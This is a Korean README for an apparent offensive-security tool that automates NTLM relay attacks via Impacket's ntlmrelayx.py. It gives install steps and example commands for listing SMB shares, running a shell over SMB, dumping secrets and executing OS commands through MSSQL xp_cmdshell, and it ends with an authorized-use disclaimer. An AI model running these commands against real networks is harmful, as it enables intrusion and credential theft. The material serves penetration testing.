
ntlmrelayx.py를 사용하여 NTLM 릴레이 공격을 자동화합니다: SMB 공유 열거, 셸 실행, 비밀 덤프 및 다중 스레드 세션을 통한 MSSQL 명령 실행.

NTLM Relay Gat은 Impacket 도구 모음에서 ntlmrelayx.py를 사용하여 NTLM 릴레이 공격을 자동화하도록 설계된 강력한 도구입니다. ntlmrelayx.py의 기능을 활용하여 NTLM 릴레이 취약점 악용 과정을 간소화하며, SMB 공유 나열부터 MSSQL 데이터베이스에서 명령 실행에 이르기까지 다양한 기능을 제공합니다.
시작하기 전에 다음 요구 사항이 충족되었는지 확인하세요.
proxychainsNTLM Relay Gat을 설치하려면 다음 단계를 따르세요.
시스템에 Python 3.6 이상이 설치되어 있는지 확인합니다.
NTLM Relay Gat 저장소를 클론합니다.
git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
pip install -r requirements.txt
이제 NTLM Relay Gat이 설치되어 사용할 준비가 되었습니다.
NTLM Relay Gat을 사용하려면 ntlmrelayx.py의 socks 명령 출력에 릴레이된 세션이 있고, proxychains가 ntlmrelayx.py의 프록시를 사용하도록 구성되어 있는지 확인한 후 원하는 옵션으로 스크립트를 실행하세요. 다음은 NTLM Relay Gat을 실행하는 몇 가지 예입니다.
# 10개의 스레드를 사용하여 사용 가능한 SMB 공유 나열
python ntlm_relay_gat.py --smb-shares -t 10
# SMB를 통해 셸 실행
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell
# 대상에서 시크릿 덤프
python ntlm_relay_gat.py --dump-secrets
# 사용 가능한 MSSQL 데이터베이스 나열
python ntlm_relay_gat.py --mssql-dbs
# xp_cmdshell을 통해 운영 체제 명령 실행
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'
NTLM Relay Gat은 교육적 및 윤리적 침투 테스트 목적으로만 사용됩니다. 사전 상호 동의 없이 대상을 공격하는 데 NTLM Relay Gat을 사용하는 것은 불법입니다. NTLM Relay Gat의 개발자는 이 도구로 인한 오용이나 손해에 대해 어떠한 책임도 지지 않습니다.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.